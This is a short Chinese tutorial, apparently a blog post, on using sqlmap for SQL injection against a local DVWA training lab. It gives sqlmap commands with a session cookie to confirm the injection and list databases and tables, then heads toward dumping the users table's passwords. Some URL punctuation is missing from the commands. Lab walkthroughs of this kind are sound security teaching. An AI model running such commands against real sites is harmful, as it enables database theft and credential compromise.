DVWA-使用sqlmap 进行sql注入过程
前置关键说明DVWA 存在登录 Cookie 校验不带 Cookie 扫描会直接 302 跳转登录页无法注入必须带上登录 Cookie 参数。##python sqlmap.py -u http://127.0.0.1:50/DVWA/vulnerabilities/sqli/?id1SubmitSubmit --cookie PHPSESSID你的session值; securitylow --batchpython sqlmap.py -u http://127.0.0.1:50/DVWA/vulnerabilities/sqli/?id1SubmitSubmit --cookie PHPSESSIDorcs9ce2kse8t2cjckh7ce418h;; securitylow --batch查询所有数据库python sqlmap.py -u http://127.0.0.1:50/DVWA/vulnerabilities/sqli/?id1SubmitSubmit --cookie PHPSESSIDorcs9ce2kse8t2cjckh7ce418h; securitylow --batch --dbsdvwa 库下所有表python sqlmap.py -u http://127.0.0.1:50/DVWA/vulnerabilities/sqli/?id1SubmitSubmit --cookie PHPSESSIDorcs9ce2kse8t2cjckh7ce418h; securitylow --batch -D dvwa --tables导出 users 表全部账号密码核心脱库